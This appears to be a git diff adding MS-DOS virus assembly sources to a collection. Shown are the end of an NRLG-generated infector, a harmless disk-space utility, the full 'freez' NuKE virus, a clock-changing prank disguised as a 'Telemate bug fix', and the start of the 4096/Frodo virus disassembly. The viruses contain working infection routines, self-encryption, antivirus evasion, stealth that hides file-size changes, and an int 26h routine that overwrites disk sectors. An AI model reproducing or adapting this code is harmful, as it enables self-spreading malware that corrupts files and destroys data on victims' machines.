;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ; +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; + +mov ax,351ch ; +int 21h ;store the int 1ch vectors +mov word ptr [trampaint+bp],bx ;in cs:trampaint +mov word ptr [trampaint+2+bp],es ; +mov ax,251ch ;put the int 1ch (clock) vector +push cs ; +pop ds ; +mov dx,offset tardar ;in offset tardar +int 21h ; +mov dx,offset fin ; +int 27h ;main resident the code +NO_DAY: ; +ret ;ret for program +tardar: ;int 1c handler +pushf ; +pusha ; +mov cx,0ffffh ;fuck loop for slow speed +trampa: ; +mov ax,ax ; +loop trampa ; +popa ; +popf ; +JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch +ret ; +trampaint dd ? ; +;--------------------------------; + +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... + int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 020H ;day for the action +action_mes Db 04H ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.free.asm b/MSDOS/Virus.MSDOS.Unknown.free.asm new file mode 100644 index 00000000..b4dfe4c4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.free.asm @@ -0,0 +1,112 @@ + title FREE.ASM + page,132 + +cseg segment para 'code' + assume cs:cseg +main proc far + org 100h +start: + jmp begin + +banner db 0ah,'FREE Vers 1.0 - Sept. 1985 - by Art Merrill',0dh,0ah,'$' + db 'Copyright (C) 1985',0dh,0ah,'$' + db 'Ziff-Davis Publishing Company',0dh,0ah,'$' +total: db 0ah,8 dup(0),' bytes total disk space',0dh,0ah +diff: db 8 dup(0),' bytes allocated',0dh,0ah +bytes: db 8 dup(0),' bytes available on disk',0dh,0ah,0ah,'$' +hltotal: dw 0,0 +hlbytes: dw 0,0 + +begin: + mov dx,offset banner + mov ah,9 + int 21h + + mov si,5ch ;address of selected drive + mov dl,[si] + mov ah,36h ;get disk free space + int 21h + + push ax ;save for total bytes + push cx ;save for total bytes + push dx ;save for total bytes + + mul bx ;get total clusters + mul cx ;get total bytes + + std + mov di,offset hlbytes+2 + xchg ax,dx + stosw + xchg ax,dx + stosw + + mov di,offset bytes+7 ;storage for ascii printout + call ascii + + pop dx ;get back total clusters + pop cx ;get back bytes per sector + pop ax ;get back sectors per cluster + + mul dx ;total clusters + mul cx ;bytes per sector + + mov di,offset hltotal+2 ;same routine as above to get + xchg ax,dx ; total bytes + stosw + xchg ax,dx + stosw + + mov di,offset total+8 ;storage for ascii printout + call ascii + + mov ax,word ptr hltotal+2 ;calculate difference between + sub ax,word ptr hlbytes+2 ; total bytes and bytes allocated + xchg ax,dx ; to get total bytes remaining + mov ax,word ptr hltotal + sub ax,word ptr hlbytes + jnc skip + dec dx ;adjust total for carry +skip: + mov di,offset diff+7 ;storage for ascii printout + call ascii + + mov dx,offset total ;print results + mov ah,9 + int 21h + + int 20h ;exit + +main endp + +ascii proc near + xchg bp,dx ;save high word + mov bx,0ah ;divisor + mov cl,30h ;conversion for ascii +rpt1: + cmp bp,0 ;are we done with high words + jz rpt2 ;yes + xchg ax,bp ;no-get high word + xor dx,dx ;clear dx + div bx + xchg bp,ax ;this will be the new high word + div bx ;divide low word + remainder + or dl,cl ;convert hex value to ascii + mov [di],dl ;quotient into storage + dec di ;step back one byte + jmp rpt1 ;go again +rpt2: + xor dx,dx ;clear dx + div bx + or dl,cl ;convert hex value to ascii + mov [di],dl ;quotient into storage + dec di ;step back one byte + cmp ax,0 ;are we done? + jnz rpt2 ;no + + ret ;yes +ascii endp + +cseg ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.freez.asm b/MSDOS/Virus.MSDOS.Unknown.freez.asm new file mode 100644 index 00000000..32dfcc56 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.freez.asm @@ -0,0 +1,416 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call TRASH_RN +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! +;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! +jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ; +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; + +j: ; +jmp j ;Halt the process +NO_DAY: ; +ret ; +;--------------------------------- +;--------------------------------- +TRASH_RN: ; +MOV AH,2DH ; +INT 21H ;get date +CMP Dl,6 ;is =6 (RAN 0-99) +jne NO_DAYY ;nop! fuck ret +mov ah,0dh ; +int 21h ;reset disk +mov al,2 ; +mov cx,0ffffh ; +mov dx,0 ; +int 26h ;fuck ffffh sector +mov ah,0dh ;reste disk +int 21h ; +mov al,2 ; +mov cx,0ffffh ; +mov dx,0ffffh ;new fuck+ +int 26h ;heheheh!!! +NO_DAYY: ; +ret ; +;--------------------------------- +;-------------; +Dir_S: ; +jmp dirsal ; +no_Good:iret ; +;-------------; + +action_dia Db 01H ;day for the action +action_mes Db 01H ;month for the action +FECHA DW 08H ;Secon for mark +FECHAd Db 08H ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.friday.asm b/MSDOS/Virus.MSDOS.Unknown.friday.asm new file mode 100644 index 00000000..fb92c737 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.friday.asm @@ -0,0 +1,32 @@ +;-------------------------------------------------------------------; +; Simple little program to change the date to July 13th, 1990 ; +; Which just happens to be a Friday...what a coincidence.... ; +; This should be great fun if you have a virus or a program that ; +; goes *BOOM* on Friday the 13th, such as the Israel strain ; +; Have fun, and remember, I'm not responsible if you get your lazy ; +; ass busted while trying to bring down the damn Pentagon ; +; Kryptic Night - SMC - RaCK - U<< - PhD ; +;-------------------------------------------------------------------; +CODE SEGMENT + Assume CS:code,DS:code + ORG 100h + +start: Jmp begin +text1 db ' Telemate bug fix for version 3.0+$ ' ;Bogus filler text +text2 db ' TM.EXE fixed!$ ' ;Bogus filler text +text3 db 07h,'Error! Cannot alter TM.EXE$ ' ;Printed after change + +Begin proc NEAR + mov ah,05h ;Function 5 - Set Real Time Clock + mov cx,1990h ;What century + mov dx,0713h ;Month/day + int 1ah ;Execute + + + mov ah,09h ;Funtion 9 - Print string + lea dx,text3 ;What text to print + int 21h ;Execute function 09 + int 20h ;Quit .COM file + begin endp +CODE ENDS ;End segment + END start ;End program diff --git a/MSDOS/Virus.MSDOS.Unknown.frodo.asm b/MSDOS/Virus.MSDOS.Unknown.frodo.asm new file mode 100644 index 00000000..ca09ea3d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.frodo.asm @@ -0,0 +1,1828 @@ +From netcom.com!ix.netcom.com!howland.reston.ans.net!usc!bloom-beacon.mit.edu!uhog.mit.edu!rutgers!engr.orst.edu!gaia.ucs.orst.edu!myhost.subdomain.domain!clair Tue Nov 29 09:49:56 1994 +Xref: netcom.com alt.comp.virus:485 +Path: netcom.com!ix.netcom.com!howland.reston.ans.net!usc!bloom-beacon.mit.edu!uhog.mit.edu!rutgers!engr.orst.edu!gaia.ucs.orst.edu!myhost.subdomain.domain!clair +From: clair@myhost.subdomain.domain (The Clairvoyant) +Newsgroups: alt.comp.virus +Subject: Frodo source +Date: 28 Nov 1994 07:47:20 GMT +Organization: String to put in the Organization Header +Lines: 1814 +Message-ID: <3bc1u8$mjc@gaia.ucs.orst.edu> +NNTP-Posting-Host: tempest.rhn.orst.edu +X-Newsreader: TIN [version 1.2 PL2] + + +_4096 segment byte public + assume cs:_4096, ds:_4096 + +; 4096 Virus +; Disassembly done by Dark Angel of Phalcon/Skism for 40Hex Issue #9 +; Assemble with TASM; the resultant file size is 4081 bytes + + org 0 +startvirus: + db 0 + jmp installvirus +oldheader: ; original 1Ch bytes of the carrier file + retn + db 75h,02,44h,15h,46h,20h + db 'Copyright Bourb%}i, I' +endoldheader: +EXEflag db 00h + db 0FEh, 3Ah + +int1: ; locate the BIOS or DOS entry point for int 13h and int 21h + push bp ; set up stack frame + mov bp,sp + push ax + cmp word ptr [bp+4],0C000h ; in BIOS? + jnb foundorigint ; nope, haven't found it + mov ax,cs:DOSsegment ; in DOS? + cmp [bp+4],ax + jbe foundorigint +exitint1: + pop ax + pop bp + iret +foundorigint: + cmp byte ptr cs:tracemode,1 + jz tracemode1 + mov ax,[bp+4] ; save segment of entry point + mov word ptr cs:origints+2,ax + mov ax,[bp+2] ; save offset of entry point + mov word ptr cs:origints,ax + jb finishint1 + pop ax + pop bp + mov ss,cs:savess ; restore the stack to its + mov sp,cs:savesp ; original state + mov al,cs:saveIMR ; Restore IMR + out 21h,al ; (enable interrupts) + jmp setvirusints +finishint1: + and word ptr [bp+6],0FEFFh ; turn off trap flag + mov al,cs:saveIMR ; and restore IMR + out 21h,al + jmp short exitint1 +tracemode1: + dec byte ptr cs:instructionstotrace + jnz exitint1 + and word ptr [bp+6],0FEFFh ; turn off trap flag + call saveregs + call swapvirint21 ; restore original int + lds dx,dword ptr cs:oldint1 ; 21h & int 1 handlers + mov al,1 + call setvect + call restoreregs + jmp short finishint1 + +getint: + push ds + push si + xor si,si ; clear si + mov ds,si ; ds->interrupt table + xor ah,ah ; cbw would be better!? + mov si,ax + shl si,1 ; convert int # to offset in + shl si,1 ; interrupt table (int # x 4) + mov bx,[si] ; es:bx = interrupt vector + mov es,[si+2] ; get old interrupt vector + ; save 3 bytes if use les bx,[si] + pop si + pop ds + retn + +installvirus: + mov word ptr cs:stackptr,offset topstack + mov cs:initialax,ax ; save initial value for ax + mov ah,30h ; Get DOS version + int 21h + + mov cs:DOSversion,al ; Save DOS version + mov cs:carrierPSP,ds ; Save PSP segment + mov ah,52h ; Get list of lists + int 21h + + mov ax,es:[bx-2] ; segment of first MCB + mov cs:DOSsegment,ax ; save it for use in int 1 + mov es,ax ; es = segment first MCB + mov ax,es:[1] ; Get owner of first MCB + mov cs:ownerfirstMCB,ax ; save it + push cs + pop ds + mov al,1 ; get single step vector + call getint + mov word ptr ds:oldint1,bx ; save it for later + mov word ptr ds:oldint1+2,es; restoration + mov al,21h ; get int 21h vector + call getint + mov word ptr ds:origints,bx + mov word ptr ds:origints+2,es + mov byte ptr ds:tracemode,0 ; regular trace mode on + mov dx,offset int1 ; set new int 1 handler + mov al,1 + call setvect + pushf + pop ax + or ax,100h ; turn on trap flag + push ax + in al,21h ; Get old IMR + mov ds:saveIMR,al + mov al,0FFh ; disable all interrupts + out 21h,al + popf + mov ah,52h ; Get list of lists + pushf ; (for tracing purposes) + call dword ptr ds:origints ; perform the tunnelling + pushf + pop ax + and ax,0FEFFh ; turn off trap flag + push ax + popf + mov al,ds:saveIMR ; reenable interrupts + out 21h,al + push ds + lds dx,dword ptr ds:oldint1 + mov al,1 ; restore int 1 to the + call setvect ; original handler + pop ds + les di,dword ptr ds:origints; set up int 21h handlers + mov word ptr ds:oldint21,di + mov word ptr ds:oldint21+2,es + mov byte ptr ds:jmpfarptr,0EAh ; jmp far ptr + mov word ptr ds:int21store,offset otherint21 + mov word ptr ds:int21store+2,cs + call swapvirint21 ; activate virus in memory + mov ax,4B00h + mov ds:checkres,ah ; set resident flag to a + ; dummy value + mov dx,offset EXEflag+1 ; save EXE flag + push word ptr ds:EXEflag + int 21h ; installation check + ; returns checkres=0 if + ; installed + + pop word ptr ds:EXEflag ; restore EXE flag + add word ptr es:[di-4],9 + nop ; !? + mov es,ds:carrierPSP ; restore ES and DS to their + mov ds,ds:carrierPSP ; original values + sub word ptr ds:[2],(topstack/10h)+1 + ; alter top of memory in PSP + mov bp,ds:[2] ; get segment + mov dx,ds + sub bp,dx + mov ah,4Ah ; Find total available memory + mov bx,0FFFFh + int 21h + + mov ah,4Ah ; Allocate all available memory + int 21h + + dec dx ; go to MCB of virus memory + mov ds,dx + cmp byte ptr ds:[0],'Z' ; is it the last block? + je carrierislastMCB + dec byte ptr cs:checkres ; mark need to install virus +carrierislastMCB: + cmp byte ptr cs:checkres,0 ; need to install? + je playwithMCBs ; nope, go play with MCBs + mov byte ptr ds:[0],'M' ; mark not end of chain +playwithMCBs: + mov ax,ds:[3] ; get memory size controlled + mov bx,ax ; by the MCB + sub ax,(topstack/10h)+1 ; calculate new size + add dx,ax ; find high memory segment + mov ds:[3],ax ; put new size in MCB + inc dx ; one more for the MCB + mov es,dx ; es->high memory MCB + mov byte ptr es:[0],'Z' ; mark end of chain + push word ptr cs:ownerfirstMCB ; get DOS PSP ID + pop word ptr es:[1] ; make it the owner + mov word ptr es:[3],160h ; fill in the size field + inc dx + mov es,dx ; es->high memory area + push cs + pop ds + mov cx,(topstack/2) ; zopy 0-1600h to high memory + mov si,offset topstack-2 + mov di,si + std ; zopy backwards + rep movsw + cld + push es ; set up stack for jmp into + mov ax,offset highentry ; virus code in high memory + push ax + mov es,cs:carrierPSP ; save current PSP segment + mov ah,4Ah ; Alter memory allocation + mov bx,bp ; bx = paragraphs + int 21h + retf ; jmp to virus code in high +highentry: ; memory + call swapvirint21 + mov word ptr cs:int21store+2,cs + call swapvirint21 + push cs + pop ds + mov byte ptr ds:handlesleft,14h ; reset free handles count + push cs + pop es + mov di,offset handletable + mov cx,14h + xor ax,ax ; clear handle table + rep stosw + mov ds:hideclustercountchange,al ; clear the flag + mov ax,ds:carrierPSP + mov es,ax ; es->PSP + lds dx,dword ptr es:[0Ah] ; get terminate vector (why?) + mov ds,ax ; ds->PSP + add ax,10h ; adjust for PSP + add word ptr cs:oldheader+16h,ax ; adjust jmp location + cmp byte ptr cs:EXEflag,0 ; for PSP + jne returntoEXE +returntoCOM: + sti + mov ax,word ptr cs:oldheader; restore first 6 bytes of the + mov ds:[100h],ax ; COM file + mov ax,word ptr cs:oldheader+2 + mov ds:[102h],ax + mov ax,word ptr cs:oldheader+4 + mov ds:[104h],ax + push word ptr cs:carrierPSP ; Segment of carrier file's + mov ax,100h ; PSP + push ax + mov ax,cs:initialax ; restore orig. value of ax + retf ; return to original COM file + +returntoEXE: + add word ptr cs:oldheader+0eh,ax + mov ax,cs:initialax ; Restore ax + mov ss,word ptr cs:oldheader+0eh ; Restore stack to + mov sp,word ptr cs:oldheader+10h ; original value + sti + jmp dword ptr cs:oldheader+14h ; jmp to original cs:IP + ; entry point +entervirus: + cmp sp,100h ; COM file? + ja dont_resetstack ; if so, skip this + xor sp,sp ; new stack +dont_resetstack: + mov bp,ax + call next ; calculate relativeness +next: + pop cx + sub cx,offset next ; cx = delta offset + mov ax,cs ; ax = segment + mov bx,10h ; convert to offset + mul bx + add ax,cx + adc dx,0 + div bx ; convert to seg:off + push ax ; set up stack for jmp + mov ax,offset installvirus ; to installvirus + push ax + mov ax,bp + retf ; go to installvirus + +int21commands: + db 30h ; get DOS version + dw offset getDOSversion + db 23h ; FCB get file size + dw offset FCBgetfilesize + db 37h ; get device info + dw offset get_device_info + db 4Bh ; execute + dw offset execute + db 3Ch ; create file w/ handle + dw offset createhandle + db 3Dh ; open file + dw offset openhandle + db 3Eh ; close file + dw offset handleclosefile + db 0Fh ; FCB open file + dw offset FCBopenfile + db 14h ; sequential FCB read + dw offset sequentialFCBread + db 21h ; random FCB read + dw offset randomFCBread + db 27h ; random FCB block read + dw offset randomFCBblockread + db 11h ; FCB find first + dw offset FCBfindfirstnext + db 12h ; FCB find next + dw offset FCBfindfirstnext + db 4Eh ; filename find first + dw offset filenamefindfirstnext + db 4Fh ; filename find next + dw offset filenamefindfirstnext + db 3Fh ; read + dw offset handleread + db 40h ; write + dw offset handlewrite + db 42h ; move file pointer + dw offset handlemovefilepointer + db 57h ; get/set file time/date + dw offset getsetfiletimedate + db 48h ; allocate memory + dw offset allocatememory +endcommands: + +otherint21: + cmp ax,4B00h ; execute? + jnz notexecute + mov cs:checkres,al ; clear the resident flag +notexecute: + push bp ; set up stack frame + mov bp,sp + push [bp+6] ; push old flags + pop cs:int21flags ; and put in variable + pop bp ; why? + push bp ; why? + mov bp,sp ; set up new stack frame + call saveregs + call swapvirint21 ; reenable DOS int 21h handler + call disableBREAK + call restoreregs + call _pushall + push bx + mov bx,offset int21commands ; bx->command table +scanforcommand: + cmp ah,cs:[bx] ; scan for the function + jne findnextcommand ; code/subroutine combination + mov bx,cs:[bx+1] + xchg bx,[bp-14h] + cld + retn +findnextcommand: + add bx,3 ; go to next command + cmp bx,offset endcommands ; in the table until + jb scanforcommand ; there are no more + pop bx +exitotherint21: + call restoreBREAK + in al,21h ; save IMR + mov cs:saveIMR,al + mov al,0FFh ; disable all interrupts + out 21h,al + mov byte ptr cs:instructionstotrace,4 ; trace into + mov byte ptr cs:tracemode,1 ; oldint21 + call replaceint1 ; set virus int 1 handler + call _popall + push ax + mov ax,cs:int21flags ; get the flags + or ax,100h ; turn on the trap flag + push ax ; and set it in motion + popf + pop ax + pop bp + jmp dword ptr cs:oldint21 ; chain back to original int + ; 21h handler -- do not return + +exitint21: + call saveregs + call restoreBREAK + call swapvirint21 + call restoreregs + pop bp + push bp ; set up stack frame + mov bp,sp + push word ptr cs:int21flags ; get the flags and put + pop word ptr [bp+6] ; them on the stack for + pop bp ; the iret + iret + +FCBfindfirstnext: + call _popall + call callint21 + or al,al ; Found any files? + jnz exitint21 ; guess not + call _pushall + call getdisktransferaddress + mov al,0 + cmp byte ptr [bx],0FFh ; Extended FCB? + jne findfirstnextnoextendedFCB + mov al,[bx+6] + add bx,7 ; convert to normal FCB +findfirstnextnoextendedFCB: + and cs:hide_size,al + test byte ptr [bx+1Ah],80h ; check year bit for virus + jz _popall_then_exitint21 ; infection tag. exit if so + sub byte ptr [bx+1Ah],0C8h ; alter file date + cmp byte ptr cs:hide_size,0 + jne _popall_then_exitint21 + sub word ptr [bx+1Dh],1000h ; hide file size + sbb word ptr [bx+1Fh],0 +_popall_then_exitint21: + call _popall + jmp short exitint21 + +FCBopenfile: + call _popall + call callint21 ; chain to original int 21h + call _pushall + or al,al ; 0 = success + jnz _popall_then_exitint21 + mov bx,dx + test byte ptr [bx+15h],80h ; check if infected yet + jz _popall_then_exitint21 + sub byte ptr [bx+15h],0C8h ; restore date + sub word ptr [bx+10h],1000h ; and hide file size + sbb byte ptr [bx+12h],0 + jmp short _popall_then_exitint21 + +randomFCBblockread: + jcxz go_exitotherint21 ; reading any blocks? + 